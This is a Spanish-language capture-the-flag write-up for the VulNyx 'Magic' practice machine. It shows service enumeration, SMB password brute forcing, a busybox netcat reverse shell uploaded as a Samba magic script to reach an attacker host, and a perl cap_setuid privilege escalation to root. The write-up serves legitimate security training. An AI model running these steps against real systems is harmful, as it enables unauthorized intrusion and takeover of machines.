VulNyx - Magic
Information
Magic es una máquina virtual vulnerable Linux de dificultad fácil de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.56
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-28 16:05 CEST
Nmap scan report for 192.168.1.56
Host is up (0.0017s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
❯ nmap -sVC -p22,80,139,445 192.168.1.56
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-28 16:05 CEST
Nmap scan report for 192.168.1.56
Host is up (0.00033s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Welcome to nginx!
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
MAC Address: 08:00:27:EA:F1:60 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: MAGIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: -1s
| smb2-time:
| date: 2025-07-28T14:06:06
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Shell (xerosec)
80/TCP (HTTP)
Site (/)
Directory Brute Force
❯ gobuster dir -w /opt/common.txt -u http://192.168.1.56
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.56
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/backup (Status: 301) [Size: 169] [--> http://192.168.1.56/backup/]
Progress: 4746 / 4747 (99.98%)
===============================================================
Finished
===============================================================
Site (/backup)
Directory Brute Force
❯ gobuster dir -w /opt/common.txt -u http://192.168.1.56/backup
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.56/backup
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/conf (Status: 301) [Size: 169] [--> http://192.168.1.56/backup/conf/]
Progress: 4746 / 4747 (99.98%)
===============================================================
Finished
===============================================================
Site (/backup/conf)
Directory Brute Force
❯ gobuster dir -w /opt/common.txt -u http://192.168.1.56/backup/conf/ -x conf,json.yml,rc
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.56/backup/conf/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: conf,json.yml,rc
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/smb.conf (Status: 200) [Size: 8799]
Progress: 18984 / 18988 (99.98%)
===============================================================
Finished
===============================================================
Site (/backup/conf/smb.conf)
Dentro de smb.conf enumero al usuario xerosec y existe definido config.sh como magic script
❯ curl -sX GET "http://192.168.1.56/backup/conf/smb.conf" | grep -A 10 '\[tmp\]'
[tmp]
comment = Temp Directory
browseable = yes
valid users = xerosec
read only = no
magic script = config.sh
create mask = 0700
directory mask = 0700
path = /tmp/
445/TCP (SMB)
Basic Enumeration
❯ netexec smb 192.168.1.56
SMB 192.168.1.56 445 MAGIC [*] Unix - Samba (name:MAGIC) (domain:MAGIC) (signing:False) (SMBv1:False)
User Enumeration
RID Brute Force
Obtengo un único usuario llamado xerosec
❯ rpcclient -W '' -U ''%'' 192.168.1.56 -c 'lookupnames root'
root S-1-22-1-0 (User: 1)
❯ for i in $(seq 1000 1005); do bash -c "rpcclient -W '' -U ''%'' 192.168.1.56 -c 'lookupsids S-1-22-1-$i'" ;done
S-1-22-1-1000 Unix User\xerosec (1)
S-1-22-1-1001 Unix User\1001 (1)
S-1-22-1-1002 Unix User\1002 (1)
S-1-22-1-1003 Unix User\1003 (1)
S-1-22-1-1004 Unix User\1004 (1)
S-1-22-1-1005 Unix User\1005 (1)
Password Brute Force
En tencia del usuario xerosec intento con netexec obtener su password y obtengo éxito con las credenciales xerosec:david1
❯ netexec smb 192.168.1.56 -u 'xerosec' -p /opt/techyou.txt
SMB 192.168.1.56 445 MAGIC [-] MAGIC\xerosec:silvia STATUS_LOGON_FAILURE
SMB 192.168.1.56 445 MAGIC [-] MAGIC\xerosec:melvin STATUS_LOGON_FAILURE
SMB 192.168.1.56 445 MAGIC [-] MAGIC\xerosec:celeste STATUS_LOGON_FAILURE
SMB 192.168.1.56 445 MAGIC [-] MAGIC\xerosec:pussycat STATUS_LOGON_FAILURE
SMB 192.168.1.56 445 MAGIC [-] MAGIC\xerosec:gorgeous STATUS_LOGON_FAILURE
SMB 192.168.1.56 445 MAGIC [+] MAGIC\xerosec:david1
Shares
List
Encuentro un share llamado tmp con permisos READ,WRITE
(El share tmp es el mismo que vi anteriormente en el archivo de configuración smb.conf)
❯ netexec smb 192.168.1.56 -u 'xerosec' -p 'david1' --shares
SMB 192.168.1.56 445 MAGIC [*] Unix - Samba (name:MAGIC) (domain:MAGIC) (signing:False) (SMBv1:False)
SMB 192.168.1.56 445 MAGIC [+] MAGIC\xerosec:david1
SMB 192.168.1.56 445 MAGIC [*] Enumerated shares
SMB 192.168.1.56 445 MAGIC Share Permissions Remark
SMB 192.168.1.56 445 MAGIC ----- ----------- ------
SMB 192.168.1.56 445 MAGIC print$ READ Printer Drivers
SMB 192.168.1.56 445 MAGIC tmp READ,WRITE Temp Directory
SMB 192.168.1.56 445 MAGIC IPC$ IPC Service (Samba 4.17.12-Debian)
Magic Scripts
Upload Script
Subo una reverse shell llamada config.sh para que la intérprete como magic script
❯ cat config.sh
busybox nc 192.168.1.5 443 -e /bin/sh
❯ smbclient //192.168.1.56/tmp -U 'xerosec%david1'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jul 28 16:36:26 2025
.. D 0 Thu Jan 2 14:06:27 2025
.font-unix DH 0 Mon Jul 28 16:03:18 2025
.ICE-unix DH 0 Mon Jul 28 16:03:18 2025
.X11-unix DH 0 Mon Jul 28 16:03:18 2025
systemd-private-4e3fef1f3eac4f6ab18dfba72613dff7-systemd-logind.service-vSaUMX D 0 Mon Jul 28 16:03:19 2025
.XIM-unix DH 0 Mon Jul 28 16:03:18 2025
19480400 blocks of size 1024. 16555156 blocks available
smb: \> put config.sh
Obtengo la shell como usuario xerosec
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.56] 59032
id ; hostname
uid=1000(xerosec) gid=1000(xerosec) grupos=1000(xerosec)
magic
Privilege Escalation
Enumeration
Sudo (Rabbit Hole)
El usuario xerosec puede ejecutar como root el binario id con sudo
xerosec@magic:/$ sudo -l
Matching Defaults entries for xerosec on magic:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User xerosec may run the following commands on magic:
(root) NOPASSWD: /usr/bin/id
Capabilities
El usuario xerosec dispone de permisos de tipo capabilities sobre el el binario perl
xerosec@magic:/$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/perl5.36.0 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/perl cap_setuid=ep
Abuse
En GTFOBins nos dan la secuencia de shell-escape y me convierto en usuario root
xerosec@magic:/$ /usr/bin/perl5.36.0 -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# bash -i
root@magic:/# id ; hostname
uid=0(root) gid=1000(xerosec) grupos=1000(xerosec)
magic
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
root@magic:/# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
8e90****************************
d148****************************
Hasta aquí la resolución de la máquina Magic.
Happy Hacking!